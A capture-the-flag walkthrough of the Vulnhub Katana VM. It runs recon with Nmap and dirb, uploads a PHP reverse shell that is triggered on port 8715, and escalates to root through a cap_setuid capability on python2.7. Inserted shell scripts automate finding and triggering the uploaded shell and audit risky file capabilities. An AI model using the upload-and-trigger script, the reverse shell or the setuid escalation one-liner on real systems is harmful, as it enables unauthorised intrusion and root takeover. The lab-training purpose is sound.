Katana: Vulnhub Walkthrough
Katana VM is made by the SunCSR Team. It is a purposely built vulnerable lab intended to give hands-on experience in penetration testing. It is rated intermediate and is handy for brushing up your skills as a penetration tester. The ultimate goal of this challenge is to get root and read the root flag.
These labs are available on the Vulnhub website; we downloaded the lab file from this link.
- Network Scanning (Netdiscover)
- Port Scanning (Nmap)
- Browsing HTTP Service
- Directory Scanning (Dirb)
- Uploading PHP Reverse Shell
- Locating the Relocated Upload (port 8715)
- Privilege Escalation (Linux File Capabilities)
Let’s start by scanning the network for targets using Netdiscover.
We found the target IP address 192.168.1.119. Let's begin with a basic port scan of the target with Nmap, covering all TCP ports with version and script detection.
nmap -p- -A 192.168.1.119
Since port 80 is open, we opened the HTTP service in a web browser for more details, but the page alone gave no clue on how to proceed.
So far we had found no hint for a foothold, so we ran DIRB, a directory brute-force tool, against the web service on port 8088. After a few tries it found the URL of an HTML upload page. Let's browse to it and see what it offers.
dirb http://192.168.1.119:8088/ -X .html
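The recon steps above (full-port Nmap scan, then dirb against each web port) are easy to chain. The script below is an added example, not code from the original walkthrough: it parses Nmap's grepable output (-oG) to list the open ports and turns every HTTP service into the URL that dirb is then pointed at. The scan text is a constructed sample limited to the ports the walkthrough mentions; the target address and the `-X .html` extension filter are taken from the walkthrough.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough: parse Nmap's
# grepable output (-oG) to list open ports and turn the HTTP ones into the
# URLs that dirb is then pointed at. The scan below is a constructed sample
# limited to the ports the walkthrough mentions; on the real target run
#   nmap -p- -A -oG katana.gnmap 192.168.1.119
# and pipe katana.gnmap through the same functions.

SAMPLE_GNMAP='# Nmap grepable output (constructed sample)
Host: 192.168.1.119 ()  Status: Up
Host: 192.168.1.119 ()  Ports: 80/open/tcp//http///, 8088/open/tcp//http///, 8715/open/tcp//http///   Ignored State: closed (65532)
# Nmap done'

# Read -oG output on stdin; print "port/proto service" for each open port.
# Each Ports: entry is port/state/proto/owner/service/rpc/version/
open_ports() {
    grep '^Host:.*Ports:' |
    sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' |
    tr ',' '\n' |
    sed 's/^[[:space:]]*//' |
    awk -F/ '$2 == "open" { print $1 "/" $3, $5 }'
}

# Read open_ports output on stdin; print a URL for every web service on host $1.
# Services reported over TLS (https, ssl|...) get https://, plain http gets http://.
web_urls() {
    awk -v h="$1" '{
        split($1, p, "/")
        if ($2 ~ /^https/ || $2 ~ /^ssl/) print "https://" h ":" p[1] "/"
        else if ($2 ~ /http/)             print "http://" h ":" p[1] "/"
    }'
}

# Stand-alone run: show the open ports and the dirb commands the scan leads to.
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
printf '%s\n' "$SAMPLE_GNMAP" | open_ports | web_urls 192.168.1.119 |
while read -r url; do
    echo "dirb $url -X .html"    # run these against the live target
done
```

Scanning all web ports rather than only port 80 is the point: on this box the upload page lived on 8088 and the relocated file on 8715, neither of which a default top-1000 scan with a single dirb run would have covered.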
On browsing the page we saw that it has a file upload option, but curiously two of them, which is interesting. We went for the second upload option and uploaded pentestmonkey's PHP reverse shell. Let's see if we can get a shell on this machine.
After the file uploaded successfully, the page asked us to wait for one minute. The message that caught our attention said the uploaded shell was being moved internally to another directory after upload. All that was left was to execute our shell.
Requesting the file on port 8088 did not work, so after a few tries we changed the port from 8088 to 8715, since the earlier message had hinted that the file was relocated. Requesting the file on that port executed it and, with our listener waiting for the reverse connection, got us a shell as www-data.
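Guessing the port by hand works on a lab box, but the step generalises. The script below is an added example, not code from the original walkthrough: it probes every candidate port and directory for a harmless marker file uploaded through the same form, and only then requests the PHP reverse shell at the location found, with the listener already up. The target address and the ports 80, 8088 and 8715 come from the walkthrough; the directory names, the marker file, `php-reverse-shell.php`, the listener port and the assumption that the form accepts a plain text file are assumptions for this lab.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough. It automates the
# "where did my upload go?" step: the form moves uploads to another
# location, so we probe every candidate port and directory for a harmless
# marker file uploaded through the same form, and only then request the
# PHP reverse shell at the location found, with the listener already up.
# Target, ports, directories and file names are assumptions for this lab;
# change them to match yours.

TARGET=${TARGET:-192.168.1.119}
CANDIDATE_PORTS=${CANDIDATE_PORTS:-"80 8088 8715"}
CANDIDATE_DIRS=${CANDIDATE_DIRS:-"/ /uploads/ /upload/ /files/"}
LISTEN_PORT=${LISTEN_PORT:-1234}     # the $port edited into php-reverse-shell.php

# HTTP status code of a URL. Kept behind a variable so the discovery logic
# can be exercised with a fake fetcher instead of a live server.
http_status() {
    curl -s -o /dev/null -m 5 -w '%{http_code}' "$1"
}
FETCH=${FETCH:-http_status}

# Print every candidate URL for file name $1.
candidate_urls() {
    for p in $CANDIDATE_PORTS; do
        for d in $CANDIDATE_DIRS; do
            printf 'http://%s:%s%s%s\n' "$TARGET" "$p" "$d" "$1"
        done
    done
}

# Print the first candidate URL that answers 200; return 1 if none does.
# Probe with an inert file (marker.txt), not the .php shell: requesting the
# shell executes it, and curl then hangs until the reverse shell exits, so
# its status code tells you nothing about where the file landed.
locate_upload() {
    for url in $(candidate_urls "$1"); do
        if [ "$("$FETCH" "$url")" = "200" ]; then
            printf '%s\n' "$url"
            return 0
        fi
    done
    return 1
}

# Swap the file name at the end of the marker URL for the shell's name.
shell_url_for() {
    printf '%s\n' "$1" | sed "s#[^/]*\$#$2#"
}

# Only touches the network when invoked as: sh find_upload.sh run
if [ "${1:-}" = "run" ]; then
    marker=$(locate_upload marker.txt) || { echo "marker not found on any candidate URL" >&2; exit 1; }
    shell=$(shell_url_for "$marker" php-reverse-shell.php)
    echo "upload landed at $marker; requesting $shell (listener: nc -lvnp $LISTEN_PORT)"
    curl -s -m 5 "$shell" >/dev/null 2>&1 &     # detach: the request blocks while the shell lives
fi
```

Start `nc -lvnp 1234` (or whatever port you edited into pentestmonkey's shell) before running with `run`; the final curl is backgrounded because the HTTP request does not return until the reverse shell exits.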
With a shell as www-data, the only thing left was root. We explored further and looked for weak configurations such as sudo rights and SUID binaries, but found nothing useful there. After spending some more time we turned to Linux file capabilities, which we enumerated recursively with getcap (stderr suppressed to hide the permission-denied noise), and saw a capability with the +ep flags set on python2.7:
getcap -r / 2>/dev/null
getcap showed that /usr/bin/python2.7 carries a file capability with the +ep flags (effective and permitted). An effective capability applies to whoever executes the binary, so www-data gets it too, and because it allows the process to change its own user ID, Python can call setuid(0) without being root. Taking advantage of this we escalate from the low-privilege shell to root with the command below.
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
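Reading `getcap -r /` output by eye is error-prone when a box has many entries, and the flags matter: `+ep` on an interpreter is a root shell, `+i` alone is not. The script below is an added example, not part of the original walkthrough: it filters getcap output for capabilities that hand any user who can run the binary a route to root, and prints the `setcap -r` command that removes each one (the fix on the defender's side). The getcap lines are a constructed sample; the python2.7 entry mirrors what the walkthrough describes, the others are made up to exercise the filter.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: audit the output of
# `getcap -r / 2>/dev/null` for file capabilities that give any user who can
# run the binary a route to root, as the capability on python2.7 does here.
# The getcap lines below are a constructed sample; pipe the real output
# through risky_caps instead.

SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/opt/backup/tar = cap_dac_read_search+ep
/usr/local/bin/helper =ep'

# Capabilities worth flagging: they let the caller change uid/gid, bypass
# file permission checks, load kernel modules, ptrace other processes, or
# re-grant capabilities. A bare "=ep" means the full set.
DANGEROUS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_sys_admin cap_sys_module cap_sys_ptrace cap_setfcap'

# Read getcap output on stdin; print "path caps" for each risky entry.
# Handles both the older "path = caps" and the newer "path caps" line formats.
# Only entries whose flags include e (effective) or p (permitted) count:
# +i alone is inheritable and does nothing for an ordinary exec.
risky_caps() {
    awk -v list="$DANGEROUS" '
        BEGIN { n = split(list, d, " ") }
        NF >= 2 {
            path = $1; caps = $NF
            flags = caps; sub(/.*[+=]/, "", flags)
            if (flags !~ /[ep]/) next
            if (caps ~ /^=/) { print path, caps, "(ALL capabilities)"; next }
            for (i = 1; i <= n; i++)
                if (index(caps, d[i]) > 0) { print path, caps; next }
        }'
}

# Print the command that strips the capability from a flagged binary;
# run it as root on the defender's side.
fix_cmd() {
    printf 'setcap -r %s\n' "$1"
}

# Stand-alone run on the sample: flagged entries, then the fixes.
printf '%s\n' "$SAMPLE_GETCAP" | risky_caps
printf '%s\n' "$SAMPLE_GETCAP" | risky_caps | while read -r path rest; do
    fix_cmd "$path"
done
```

Usage on a live box: `getcap -r / 2>/dev/null | risky_caps`. For the python2.7 entry the abuse is the walkthrough's own one-liner; for cap_dac_read_search on tar the route is reading files such as /etc/shadow rather than setuid, so the audit tells you where to look, not which command to run.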
*NOTE: For privilege escalation through capabilities, please refer to the link below.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 3 years in the field of security as a Penetration Tester and Security Analyst.